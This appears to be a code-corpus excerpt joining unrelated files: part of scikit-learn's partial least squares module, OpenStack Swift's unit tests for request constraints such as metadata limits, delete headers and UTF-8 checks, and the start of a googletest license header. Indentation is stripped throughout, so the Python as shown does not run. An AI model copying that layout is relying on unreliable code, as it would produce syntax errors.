>>> pls2 = PLSRegression(n_components=2)
>>> pls2.fit(X, Y)
... # doctest: +NORMALIZE_WHITESPACE
PLSRegression(copy=True, max_iter=500, n_components=2, scale=True,
tol=1e-06)
>>> Y_pred = pls2.predict(X)
References
----------
Jacob A. Wegelin. A survey of Partial Least Squares (PLS) methods, with
emphasis on the two-block case. Technical Report 371, Department of
Statistics, University of Washington, Seattle, 2000.
    In French but still a reference:
Tenenhaus, M. (1998). La regression PLS: theorie et pratique. Paris:
Editions Technic.
"""
def __init__(self, n_components=2, scale=True,
max_iter=500, tol=1e-06, copy=True):
_PLS.__init__(self, n_components=n_components, scale=scale,
deflation_mode="regression", mode="A",
norm_y_weights=False, max_iter=max_iter, tol=tol,
copy=copy)
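# Hedged usage sketch, not part of the original module: it exercises the
# PLS2 deflation described in the Notes above on the toy data from the
# docstring. The helper name is hypothetical; only NumPy and scikit-learn
# are assumed.
def _example_pls2_regression():
    import numpy as np
    from sklearn.cross_decomposition import PLSRegression
    X = np.array([[0., 0., 1.], [1., 0., 0.], [2., 2., 2.], [2., 5., 4.]])
    Y = np.array([[0.1, -0.2], [0.9, 1.1], [6.2, 5.9], [11.9, 12.3]])
    pls2 = PLSRegression(n_components=2).fit(X, Y)
    # coef_ maps the centered, scaled X block onto Y: shape [p, q] == (3, 2)
    # per the docstring above.
    assert pls2.coef_.shape == (3, 2)
    # One NIPALS inner-loop iteration count per extracted component.
    return pls2.predict(X), pls2.n_iter_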
class PLSCanonical(_PLS):
""" PLSCanonical implements the 2 blocks canonical PLS of the original Wold
algorithm [Tenenhaus 1998] p.204, referred as PLS-C2A in [Wegelin 2000].
This class inherits from PLS with mode="A" and deflation_mode="canonical",
norm_y_weights=True and algorithm="nipals", but svd should provide similar
results up to numerical errors.
Read more in the :ref:`User Guide <cross_decomposition>`.
Parameters
----------
n_components : int, (default 2)
Number of components to keep.
scale : boolean, (default True)
Whether to scale the data.
algorithm : string, "nipals" or "svd"
The algorithm used to estimate the weights. It will be called
n_components times, i.e. once for each iteration of the outer loop.
max_iter : int, (default 500)
The maximum number of iterations of the NIPALS inner loop (used
only if algorithm="nipals").
tol : non-negative real, (default 1e-06)
The tolerance used in the iterative algorithm.
copy : boolean, default True
Whether the deflation should be done on a copy. Leave the default
value set to True unless you do not care about side effects.
Attributes
----------
x_weights_ : array, shape = [p, n_components]
X block weights vectors.
y_weights_ : array, shape = [q, n_components]
Y block weights vectors.
x_loadings_ : array, shape = [p, n_components]
X block loadings vectors.
y_loadings_ : array, shape = [q, n_components]
Y block loadings vectors.
x_scores_ : array, shape = [n_samples, n_components]
X scores.
y_scores_ : array, shape = [n_samples, n_components]
Y scores.
x_rotations_ : array, shape = [p, n_components]
X block to latents rotations.
y_rotations_ : array, shape = [q, n_components]
Y block to latents rotations.
n_iter_ : array-like
Number of iterations of the NIPALS inner loop for each
component. Not useful if the algorithm provided is "svd".
Notes
-----
For each component k, find weights u, v that optimize::
max corr(Xk u, Yk v) * var(Xk u) var(Yk v), such that ``|u| = |v| = 1``
Note that it maximizes both the correlations between the scores and the
intra-block variances.
The residual matrix of X (Xk+1) block is obtained by the deflation on the
current X score: x_score.
The residual matrix of Y (Yk+1) block is obtained by deflation on the
current Y score. This performs a canonical symmetric version of the PLS
regression, but one slightly different from CCA. This is mostly used
for modeling.
This implementation provides the same results as the "plspm" package
available in the R language (R-project), using the function plsca(X, Y).
Results are equal or collinear with the function
``pls(..., mode = "canonical")`` of the "mixOmics" package. The difference
lies in the fact that the mixOmics implementation does not exactly implement
the Wold algorithm, since it does not normalize y_weights to one.
Examples
--------
>>> from sklearn.cross_decomposition import PLSCanonical
>>> X = [[0., 0., 1.], [1.,0.,0.], [2.,2.,2.], [2.,5.,4.]]
>>> Y = [[0.1, -0.2], [0.9, 1.1], [6.2, 5.9], [11.9, 12.3]]
>>> plsca = PLSCanonical(n_components=2)
>>> plsca.fit(X, Y)
... # doctest: +NORMALIZE_WHITESPACE
PLSCanonical(algorithm='nipals', copy=True, max_iter=500, n_components=2,
scale=True, tol=1e-06)
>>> X_c, Y_c = plsca.transform(X, Y)
References
----------
Jacob A. Wegelin. A survey of Partial Least Squares (PLS) methods, with
emphasis on the two-block case. Technical Report 371, Department of
Statistics, University of Washington, Seattle, 2000.
Tenenhaus, M. (1998). La regression PLS: theorie et pratique. Paris:
Editions Technic.
See also
--------
CCA
PLSSVD
"""
def __init__(self, n_components=2, scale=True, algorithm="nipals",
max_iter=500, tol=1e-06, copy=True):
_PLS.__init__(self, n_components=n_components, scale=scale,
deflation_mode="canonical", mode="A",
norm_y_weights=True, algorithm=algorithm,
max_iter=max_iter, tol=tol, copy=copy)
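# Hedged sketch (hypothetical helper, assumes NumPy and scikit-learn): the
# canonical mode yields paired latent scores; per the Notes above, each
# component's X and Y scores should be strongly correlated on the
# docstring's toy data.
def _example_plscanonical_scores():
    import numpy as np
    from sklearn.cross_decomposition import PLSCanonical
    X = np.array([[0., 0., 1.], [1., 0., 0.], [2., 2., 2.], [2., 5., 4.]])
    Y = np.array([[0.1, -0.2], [0.9, 1.1], [6.2, 5.9], [11.9, 12.3]])
    X_c, Y_c = PLSCanonical(n_components=2).fit(X, Y).transform(X, Y)
    # Per-component correlation between the paired X and Y scores.
    return [np.corrcoef(X_c[:, k], Y_c[:, k])[0, 1] for k in range(2)]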
class PLSSVD(BaseEstimator, TransformerMixin):
"""Partial Least Square SVD
Simply perform a svd on the crosscovariance matrix: X'Y
There are no iterative deflation here.
Read more in the :ref:`User Guide <cross_decomposition>`.
Parameters
----------
n_components : int, default 2
Number of components to keep.
scale : boolean, default True
Whether to scale X and Y.
copy : boolean, default True
Whether to copy X and Y, or perform in-place computations.
Attributes
----------
x_weights_ : array, [p, n_components]
X block weights vectors.
y_weights_ : array, [q, n_components]
Y block weights vectors.
x_scores_ : array, [n_samples, n_components]
X scores.
y_scores_ : array, [n_samples, n_components]
Y scores.
See also
--------
PLSCanonical
CCA
"""
def __init__(self, n_components=2, scale=True, copy=True):
self.n_components = n_components
self.scale = scale
self.copy = copy
def fit(self, X, Y):
"""Fit the model by an SVD of the cross-covariance matrix X'Y."""
# copy since this will contain the centered data
check_consistent_length(X, Y)
X = check_array(X, dtype=np.float64, copy=self.copy)
Y = check_array(Y, dtype=np.float64, copy=self.copy, ensure_2d=False)
if Y.ndim == 1:
Y = Y.reshape(-1, 1)
if self.n_components > max(Y.shape[1], X.shape[1]):
raise ValueError("Invalid number of components n_components=%d"
" with X of shape %s and Y of shape %s."
% (self.n_components, str(X.shape), str(Y.shape)))
# Scale (in place)
X, Y, self.x_mean_, self.y_mean_, self.x_std_, self.y_std_ =\
_center_scale_xy(X, Y, self.scale)
# svd(X'Y)
C = np.dot(X.T, Y)
# The arpack svds solver only works if the number of extracted
# components is smaller than rank(X) - 1. Hence, if we want to extract
# all the components (C.shape[1]), we have to use another one. Else,
# let's use arpack to compute only the interesting components.
if self.n_components >= np.min(C.shape):
U, s, V = linalg.svd(C, full_matrices=False)
else:
U, s, V = arpack.svds(C, k=self.n_components)
V = V.T
self.x_scores_ = np.dot(X, U)
self.y_scores_ = np.dot(Y, V)
self.x_weights_ = U
self.y_weights_ = V
return self
def transform(self, X, Y=None):
"""Apply the dimension reduction learned on the train data."""
check_is_fitted(self, 'x_mean_')
X = check_array(X, dtype=np.float64)
Xr = (X - self.x_mean_) / self.x_std_
x_scores = np.dot(Xr, self.x_weights_)
if Y is not None:
if Y.ndim == 1:
Y = Y.reshape(-1, 1)
Yr = (Y - self.y_mean_) / self.y_std_
y_scores = np.dot(Yr, self.y_weights_)
return x_scores, y_scores
return x_scores
def fit_transform(self, X, y=None, **fit_params):
"""Learn and apply the dimension reduction on the train data.
Parameters
----------
X : array-like of predictors, shape = [n_samples, p]
Training vectors, where n_samples is the number of samples and
p is the number of predictors.
Y : array-like of response, shape = [n_samples, q], optional
Training vectors, where n_samples is the number of samples and
q is the number of response variables.
Returns
-------
x_scores if Y is not given, (x_scores, y_scores) otherwise.
"""
return self.fit(X, y, **fit_params).transform(X, y)
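# Hedged sketch (hypothetical helper): as the PLSSVD docstring states, the
# weights are the singular vectors of the centered, scaled cross-covariance
# matrix X'Y; this checks the correspondence up to sign on random data.
def _example_plssvd_equals_direct_svd():
    import numpy as np
    from scipy import linalg
    from sklearn.cross_decomposition import PLSSVD
    rng = np.random.RandomState(0)
    X, Y = rng.randn(20, 3), rng.randn(20, 2)
    est = PLSSVD(n_components=2).fit(X, Y)
    # Center and scale by hand (assumes _center_scale_xy uses ddof=1).
    Xc = (X - X.mean(axis=0)) / X.std(axis=0, ddof=1)
    Yc = (Y - Y.mean(axis=0)) / Y.std(axis=0, ddof=1)
    U, s, Vt = linalg.svd(np.dot(Xc.T, Yc), full_matrices=False)
    # Singular vectors match x_weights_ up to a possible sign flip.
    return np.allclose(np.abs(U[:, :2]), np.abs(est.x_weights_))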
| bsd-3-clause |
hurricanerix/swift | test/unit/common/test_constraints.py | 2 | 25596 | # Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import mock
import tempfile
import time
from six.moves import range
from test import safe_repr
from test.unit import MockTrue
from swift.common.swob import Request, HTTPException
from swift.common.http import HTTP_REQUEST_ENTITY_TOO_LARGE, \
HTTP_BAD_REQUEST, HTTP_LENGTH_REQUIRED, HTTP_NOT_IMPLEMENTED
from swift.common import constraints, utils
from swift.common.constraints import MAX_OBJECT_NAME_LENGTH
class TestConstraints(unittest.TestCase):
def assertIn(self, member, container, msg=None):
"""Copied from 2.7"""
if member not in container:
standardMsg = '%s not found in %s' % (safe_repr(member),
safe_repr(container))
self.fail(self._formatMessage(msg, standardMsg))
def test_check_metadata_empty(self):
headers = {}
self.assertEqual(constraints.check_metadata(Request.blank(
'/', headers=headers), 'object'), None)
def test_check_metadata_good(self):
headers = {'X-Object-Meta-Name': 'Value'}
self.assertEqual(constraints.check_metadata(Request.blank(
'/', headers=headers), 'object'), None)
def test_check_metadata_empty_name(self):
headers = {'X-Object-Meta-': 'Value'}
resp = constraints.check_metadata(Request.blank(
'/', headers=headers), 'object')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn('Metadata name cannot be empty', resp.body)
def test_check_metadata_non_utf8(self):
headers = {'X-Account-Meta-Foo': b'\xff'}
resp = constraints.check_metadata(Request.blank(
'/', headers=headers), 'account')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn('Metadata must be valid UTF-8', resp.body)
headers = {b'X-Container-Meta-\xff': 'foo'}
resp = constraints.check_metadata(Request.blank(
'/', headers=headers), 'container')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn('Metadata must be valid UTF-8', resp.body)
# Object's OK; its metadata isn't serialized as JSON
headers = {'X-Object-Meta-Foo': b'\xff'}
self.assertIsNone(constraints.check_metadata(Request.blank(
'/', headers=headers), 'object'))
def test_check_metadata_name_length(self):
name = 'a' * constraints.MAX_META_NAME_LENGTH
headers = {'X-Object-Meta-%s' % name: 'v'}
self.assertEqual(constraints.check_metadata(Request.blank(
'/', headers=headers), 'object'), None)
name = 'a' * (constraints.MAX_META_NAME_LENGTH + 1)
headers = {'X-Object-Meta-%s' % name: 'v'}
resp = constraints.check_metadata(Request.blank(
'/', headers=headers), 'object')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn(
('X-Object-Meta-%s' % name).lower(), resp.body.lower())
self.assertIn('Metadata name too long', resp.body)
def test_check_metadata_value_length(self):
value = 'a' * constraints.MAX_META_VALUE_LENGTH
headers = {'X-Object-Meta-Name': value}
self.assertEqual(constraints.check_metadata(Request.blank(
'/', headers=headers), 'object'), None)
value = 'a' * (constraints.MAX_META_VALUE_LENGTH + 1)
headers = {'X-Object-Meta-Name': value}
resp = constraints.check_metadata(Request.blank(
'/', headers=headers), 'object')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn('x-object-meta-name', resp.body.lower())
self.assertIn(
str(constraints.MAX_META_VALUE_LENGTH), resp.body)
self.assertIn('Metadata value longer than 256', resp.body)
def test_check_metadata_count(self):
headers = {}
for x in range(constraints.MAX_META_COUNT):
headers['X-Object-Meta-%d' % x] = 'v'
self.assertEqual(constraints.check_metadata(Request.blank(
'/', headers=headers), 'object'), None)
headers['X-Object-Meta-Too-Many'] = 'v'
resp = constraints.check_metadata(Request.blank(
'/', headers=headers), 'object')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn('Too many metadata items', resp.body)
def test_check_metadata_size(self):
headers = {}
size = 0
chunk = constraints.MAX_META_NAME_LENGTH + \
constraints.MAX_META_VALUE_LENGTH
x = 0
while size + chunk < constraints.MAX_META_OVERALL_SIZE:
headers['X-Object-Meta-%04d%s' %
(x, 'a' * (constraints.MAX_META_NAME_LENGTH - 4))] = \
'v' * constraints.MAX_META_VALUE_LENGTH
size += chunk
x += 1
self.assertEqual(constraints.check_metadata(Request.blank(
'/', headers=headers), 'object'), None)
# add two more headers in case adding just one falls exactly on the
# limit (eg one header adds 1024 and the limit is 2048)
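# (Assuming Swift's stock defaults, each chunk is MAX_META_NAME_LENGTH +
# MAX_META_VALUE_LENGTH = 128 + 256 = 384 bytes against
# MAX_META_OVERALL_SIZE = 4096; since the loop exits once size + chunk
# reaches the cap, two extra headers always push the total past the limit.)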
headers['X-Object-Meta-%04d%s' %
(x, 'a' * (constraints.MAX_META_NAME_LENGTH - 4))] = \
'v' * constraints.MAX_META_VALUE_LENGTH
headers['X-Object-Meta-%04d%s' %
(x + 1, 'a' * (constraints.MAX_META_NAME_LENGTH - 4))] = \
'v' * constraints.MAX_META_VALUE_LENGTH
resp = constraints.check_metadata(Request.blank(
'/', headers=headers), 'object')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn('Total metadata too large', resp.body)
def test_check_object_creation_content_length(self):
headers = {'Content-Length': str(constraints.MAX_FILE_SIZE),
'Content-Type': 'text/plain'}
self.assertEqual(constraints.check_object_creation(Request.blank(
'/', headers=headers), 'object_name'), None)
headers = {'Content-Length': str(constraints.MAX_FILE_SIZE + 1),
'Content-Type': 'text/plain'}
resp = constraints.check_object_creation(
Request.blank('/', headers=headers), 'object_name')
self.assertEqual(resp.status_int, HTTP_REQUEST_ENTITY_TOO_LARGE)
headers = {'Transfer-Encoding': 'chunked',
'Content-Type': 'text/plain'}
self.assertEqual(constraints.check_object_creation(Request.blank(
'/', headers=headers), 'object_name'), None)
headers = {'Transfer-Encoding': 'gzip',
'Content-Type': 'text/plain'}
resp = constraints.check_object_creation(Request.blank(
'/', headers=headers), 'object_name')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn('Invalid Transfer-Encoding header value', resp.body)
headers = {'Content-Type': 'text/plain'}
resp = constraints.check_object_creation(
Request.blank('/', headers=headers), 'object_name')
self.assertEqual(resp.status_int, HTTP_LENGTH_REQUIRED)
headers = {'Content-Length': 'abc',
'Content-Type': 'text/plain'}
resp = constraints.check_object_creation(Request.blank(
'/', headers=headers), 'object_name')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn('Invalid Content-Length header value', resp.body)
headers = {'Transfer-Encoding': 'gzip,chunked',
'Content-Type': 'text/plain'}
resp = constraints.check_object_creation(Request.blank(
'/', headers=headers), 'object_name')
self.assertEqual(resp.status_int, HTTP_NOT_IMPLEMENTED)
def test_check_object_creation_name_length(self):
headers = {'Transfer-Encoding': 'chunked',
'Content-Type': 'text/plain'}
name = 'o' * constraints.MAX_OBJECT_NAME_LENGTH
self.assertEqual(constraints.check_object_creation(Request.blank(
'/', headers=headers), name), None)
name = 'o' * (MAX_OBJECT_NAME_LENGTH + 1)
resp = constraints.check_object_creation(
Request.blank('/', headers=headers), name)
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn('Object name length of %d longer than %d' %
(MAX_OBJECT_NAME_LENGTH + 1, MAX_OBJECT_NAME_LENGTH),
resp.body)
def test_check_object_creation_content_type(self):
headers = {'Transfer-Encoding': 'chunked',
'Content-Type': 'text/plain'}
self.assertEqual(constraints.check_object_creation(Request.blank(
'/', headers=headers), 'object_name'), None)
headers = {'Transfer-Encoding': 'chunked'}
resp = constraints.check_object_creation(
Request.blank('/', headers=headers), 'object_name')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn('No content type', resp.body)
def test_check_object_creation_bad_content_type(self):
headers = {'Transfer-Encoding': 'chunked',
'Content-Type': '\xff\xff'}
resp = constraints.check_object_creation(
Request.blank('/', headers=headers), 'object_name')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertTrue('Content-Type' in resp.body)
def test_check_object_creation_bad_delete_headers(self):
headers = {'Transfer-Encoding': 'chunked',
'Content-Type': 'text/plain',
'X-Delete-After': 'abc'}
resp = constraints.check_object_creation(
Request.blank('/', headers=headers), 'object_name')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertTrue('Non-integer X-Delete-After' in resp.body)
t = str(int(time.time() - 60))
headers = {'Transfer-Encoding': 'chunked',
'Content-Type': 'text/plain',
'X-Delete-At': t}
resp = constraints.check_object_creation(
Request.blank('/', headers=headers), 'object_name')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertTrue('X-Delete-At in past' in resp.body)
def test_check_delete_headers(self):
# X-Delete-After
headers = {'X-Delete-After': '60'}
resp = constraints.check_delete_headers(
Request.blank('/', headers=headers))
self.assertTrue(isinstance(resp, Request))
self.assertTrue('x-delete-at' in resp.headers)
headers = {'X-Delete-After': 'abc'}
try:
resp = constraints.check_delete_headers(
Request.blank('/', headers=headers))
except HTTPException as e:
self.assertEqual(e.status_int, HTTP_BAD_REQUEST)
self.assertTrue('Non-integer X-Delete-After' in e.body)
else:
self.fail("Should have failed with HTTPBadRequest")
headers = {'X-Delete-After': '60.1'}
try:
resp = constraints.check_delete_headers(
Request.blank('/', headers=headers))
except HTTPException as e:
self.assertEqual(e.status_int, HTTP_BAD_REQUEST)
self.assertTrue('Non-integer X-Delete-After' in e.body)
else:
self.fail("Should have failed with HTTPBadRequest")
headers = {'X-Delete-After': '-1'}
try:
resp = constraints.check_delete_headers(
Request.blank('/', headers=headers))
except HTTPException as e:
self.assertEqual(e.status_int, HTTP_BAD_REQUEST)
self.assertTrue('X-Delete-After in past' in e.body)
else:
self.fail("Should have failed with HTTPBadRequest")
# X-Delete-At
t = str(int(time.time() + 100))
headers = {'X-Delete-At': t}
resp = constraints.check_delete_headers(
Request.blank('/', headers=headers))
self.assertTrue(isinstance(resp, Request))
self.assertTrue('x-delete-at' in resp.headers)
self.assertEqual(resp.headers.get('X-Delete-At'), t)
headers = {'X-Delete-At': 'abc'}
try:
resp = constraints.check_delete_headers(
Request.blank('/', headers=headers))
except HTTPException as e:
self.assertEqual(e.status_int, HTTP_BAD_REQUEST)
self.assertTrue('Non-integer X-Delete-At' in e.body)
else:
self.fail("Should have failed with HTTPBadRequest")
t = str(int(time.time() + 100)) + '.1'
headers = {'X-Delete-At': t}
try:
resp = constraints.check_delete_headers(
Request.blank('/', headers=headers))
except HTTPException as e:
self.assertEqual(e.status_int, HTTP_BAD_REQUEST)
self.assertTrue('Non-integer X-Delete-At' in e.body)
else:
self.fail("Should have failed with HTTPBadRequest")
t = str(int(time.time()))
headers = {'X-Delete-At': t}
try:
resp = constraints.check_delete_headers(
Request.blank('/', headers=headers))
except HTTPException as e:
self.assertEqual(e.status_int, HTTP_BAD_REQUEST)
self.assertTrue('X-Delete-At in past' in e.body)
else:
self.fail("Should have failed with HTTPBadRequest")
t = str(int(time.time() - 1))
headers = {'X-Delete-At': t}
try:
resp = constraints.check_delete_headers(
Request.blank('/', headers=headers))
except HTTPException as e:
self.assertEqual(e.status_int, HTTP_BAD_REQUEST)
self.assertTrue('X-Delete-At in past' in e.body)
else:
self.fail("Should have failed with HTTPBadRequest")
def test_check_delete_headers_sets_delete_at(self):
t = time.time() + 1000
# check delete-at is passed through
headers = {'Content-Length': '0',
'Content-Type': 'text/plain',
'X-Delete-At': str(int(t))}
req = Request.blank('/', headers=headers)
constraints.check_delete_headers(req)
self.assertTrue('X-Delete-At' in req.headers)
self.assertEqual(req.headers['X-Delete-At'], str(int(t)))
# check delete-after is converted to delete-at
headers = {'Content-Length': '0',
'Content-Type': 'text/plain',
'X-Delete-After': '42'}
req = Request.blank('/', headers=headers)
with mock.patch('time.time', lambda: t):
constraints.check_delete_headers(req)
self.assertTrue('X-Delete-At' in req.headers)
expected = str(int(t) + 42)
self.assertEqual(req.headers['X-Delete-At'], expected)
# check delete-after takes precedence over delete-at
headers = {'Content-Length': '0',
'Content-Type': 'text/plain',
'X-Delete-After': '42',
'X-Delete-At': str(int(t) + 40)}
req = Request.blank('/', headers=headers)
with mock.patch('time.time', lambda: t):
constraints.check_delete_headers(req)
self.assertTrue('X-Delete-At' in req.headers)
self.assertEqual(req.headers['X-Delete-At'], expected)
headers = {'Content-Length': '0',
'Content-Type': 'text/plain',
'X-Delete-After': '42',
'X-Delete-At': str(int(t) + 44)}
req = Request.blank('/', headers=headers)
with mock.patch('time.time', lambda: t):
constraints.check_delete_headers(req)
self.assertTrue('X-Delete-At' in req.headers)
self.assertEqual(req.headers['X-Delete-At'], expected)
def test_check_dir(self):
self.assertFalse(constraints.check_dir('', ''))
with mock.patch("os.path.isdir", MockTrue()):
self.assertTrue(constraints.check_dir('/srv', 'foo/bar'))
def test_check_mount(self):
self.assertFalse(constraints.check_mount('', ''))
with mock.patch("swift.common.utils.ismount", MockTrue()):
self.assertTrue(constraints.check_mount('/srv', '1'))
self.assertTrue(constraints.check_mount('/srv', 'foo-bar'))
self.assertTrue(constraints.check_mount(
'/srv', '003ed03c-242a-4b2f-bee9-395f801d1699'))
self.assertFalse(constraints.check_mount('/srv', 'foo bar'))
self.assertFalse(constraints.check_mount('/srv', 'foo/bar'))
self.assertFalse(constraints.check_mount('/srv', 'foo?bar'))
def test_check_float(self):
self.assertFalse(constraints.check_float(''))
self.assertTrue(constraints.check_float('0'))
def test_valid_timestamp(self):
self.assertRaises(HTTPException,
constraints.valid_timestamp,
Request.blank('/'))
self.assertRaises(HTTPException,
constraints.valid_timestamp,
Request.blank('/', headers={
'X-Timestamp': 'asdf'}))
timestamp = utils.Timestamp(time.time())
req = Request.blank('/', headers={'X-Timestamp': timestamp.internal})
self.assertEqual(timestamp, constraints.valid_timestamp(req))
req = Request.blank('/', headers={'X-Timestamp': timestamp.normal})
self.assertEqual(timestamp, constraints.valid_timestamp(req))
def test_check_utf8(self):
unicode_sample = u'\uc77c\uc601'
valid_utf8_str = unicode_sample.encode('utf-8')
invalid_utf8_str = unicode_sample.encode('utf-8')[::-1]
unicode_with_null = u'abc\u0000def'
utf8_with_null = unicode_with_null.encode('utf-8')
for false_argument in [None,
'',
invalid_utf8_str,
unicode_with_null,
utf8_with_null]:
self.assertFalse(constraints.check_utf8(false_argument))
for true_argument in ['this is ascii and utf-8, too',
unicode_sample,
valid_utf8_str]:
self.assertTrue(constraints.check_utf8(true_argument))
def test_check_utf8_non_canonical(self):
self.assertFalse(constraints.check_utf8('\xed\xa0\xbc\xed\xbc\xb8'))
self.assertFalse(constraints.check_utf8('\xed\xa0\xbd\xed\xb9\x88'))
def test_check_utf8_lone_surrogates(self):
self.assertFalse(constraints.check_utf8('\xed\xa0\xbc'))
self.assertFalse(constraints.check_utf8('\xed\xb9\x88'))
def test_validate_bad_meta(self):
req = Request.blank(
'/v/a/c/o',
headers={'x-object-meta-hello':
'ab' * constraints.MAX_HEADER_SIZE})
self.assertEqual(constraints.check_metadata(req, 'object').status_int,
HTTP_BAD_REQUEST)
self.assertIn('x-object-meta-hello', constraints.check_metadata(req,
'object').body.lower())
def test_validate_constraints(self):
c = constraints
self.assertTrue(c.MAX_META_OVERALL_SIZE > c.MAX_META_NAME_LENGTH)
self.assertTrue(c.MAX_META_OVERALL_SIZE > c.MAX_META_VALUE_LENGTH)
self.assertTrue(c.MAX_HEADER_SIZE > c.MAX_META_NAME_LENGTH)
self.assertTrue(c.MAX_HEADER_SIZE > c.MAX_META_VALUE_LENGTH)
def test_check_account_format(self):
req = Request.blank(
'/v/a/c/o',
headers={'X-Copy-From-Account': 'account/with/slashes'})
self.assertRaises(HTTPException,
constraints.check_account_format,
req, req.headers['X-Copy-From-Account'])
req = Request.blank(
'/v/a/c/o',
headers={'X-Copy-From-Account': ''})
self.assertRaises(HTTPException,
constraints.check_account_format,
req, req.headers['X-Copy-From-Account'])
def test_check_container_format(self):
invalid_versions_locations = (
'container/with/slashes',
'', # empty
)
for versions_location in invalid_versions_locations:
req = Request.blank(
'/v/a/c/o', headers={
'X-Versions-Location': versions_location})
try:
constraints.check_container_format(
req, req.headers['X-Versions-Location'])
except HTTPException as e:
self.assertTrue(e.body.startswith('Container name cannot'))
else:
self.fail('check_container_format did not raise error for %r' %
req.headers['X-Versions-Location'])
def test_valid_api_version(self):
version = 'v1'
self.assertTrue(constraints.valid_api_version(version))
version = 'v1.0'
self.assertTrue(constraints.valid_api_version(version))
version = 'v2'
self.assertFalse(constraints.valid_api_version(version))
class TestConstraintsConfig(unittest.TestCase):
def test_default_constraints(self):
for key in constraints.DEFAULT_CONSTRAINTS:
# if there are local over-rides in swift.conf we just continue on
if key in constraints.OVERRIDE_CONSTRAINTS:
continue
# module level attrs (that aren't in OVERRIDE) should have the
# same value as the DEFAULT map
module_level_value = getattr(constraints, key.upper())
self.assertEqual(constraints.DEFAULT_CONSTRAINTS[key],
module_level_value)
def test_effective_constraints(self):
for key in constraints.DEFAULT_CONSTRAINTS:
# module level attrs should always mirror the same value as the
# EFFECTIVE map
module_level_value = getattr(constraints, key.upper())
self.assertEqual(constraints.EFFECTIVE_CONSTRAINTS[key],
module_level_value)
# if there are local over-rides in swift.conf those should be
# reflected in the EFFECTIVE, otherwise we expect the DEFAULTs
self.assertEqual(constraints.EFFECTIVE_CONSTRAINTS[key],
constraints.OVERRIDE_CONSTRAINTS.get(
key, constraints.DEFAULT_CONSTRAINTS[key]))
def test_override_constraints(self):
try:
with tempfile.NamedTemporaryFile() as f:
f.write('[swift-constraints]\n')
# set everything to 1
for key in constraints.DEFAULT_CONSTRAINTS:
f.write('%s = 1\n' % key)
f.flush()
with mock.patch.object(utils, 'SWIFT_CONF_FILE', f.name):
constraints.reload_constraints()
for key in constraints.DEFAULT_CONSTRAINTS:
# module level attrs should all be 1
module_level_value = getattr(constraints, key.upper())
self.assertEqual(module_level_value, 1)
# all keys should be in OVERRIDE
self.assertEqual(constraints.OVERRIDE_CONSTRAINTS[key],
module_level_value)
# module level attrs should always mirror the same value as
# the EFFECTIVE map
self.assertEqual(constraints.EFFECTIVE_CONSTRAINTS[key],
module_level_value)
finally:
constraints.reload_constraints()
def test_reload_reset(self):
try:
with tempfile.NamedTemporaryFile() as f:
f.write('[swift-constraints]\n')
# set everything to 1
for key in constraints.DEFAULT_CONSTRAINTS:
f.write('%s = 1\n' % key)
f.flush()
with mock.patch.object(utils, 'SWIFT_CONF_FILE', f.name):
constraints.reload_constraints()
self.assertTrue(constraints.SWIFT_CONSTRAINTS_LOADED)
self.assertEqual(sorted(constraints.DEFAULT_CONSTRAINTS.keys()),
sorted(constraints.OVERRIDE_CONSTRAINTS.keys()))
# file is now deleted...
with mock.patch.object(utils, 'SWIFT_CONF_FILE', f.name):
constraints.reload_constraints()
# no constraints have been loaded from non-existent swift.conf
self.assertFalse(constraints.SWIFT_CONSTRAINTS_LOADED)
# no constraints are in OVERRIDE
self.assertEqual([], constraints.OVERRIDE_CONSTRAINTS.keys())
# the EFFECTIVE constraints mirror DEFAULT
self.assertEqual(constraints.EFFECTIVE_CONSTRAINTS,
constraints.DEFAULT_CONSTRAINTS)
finally:
constraints.reload_constraints()
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
kbiElude/Emerald | Emerald/gtest-1.6.0/test/gtest_output_test.py | 1733 | 12005 | #!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
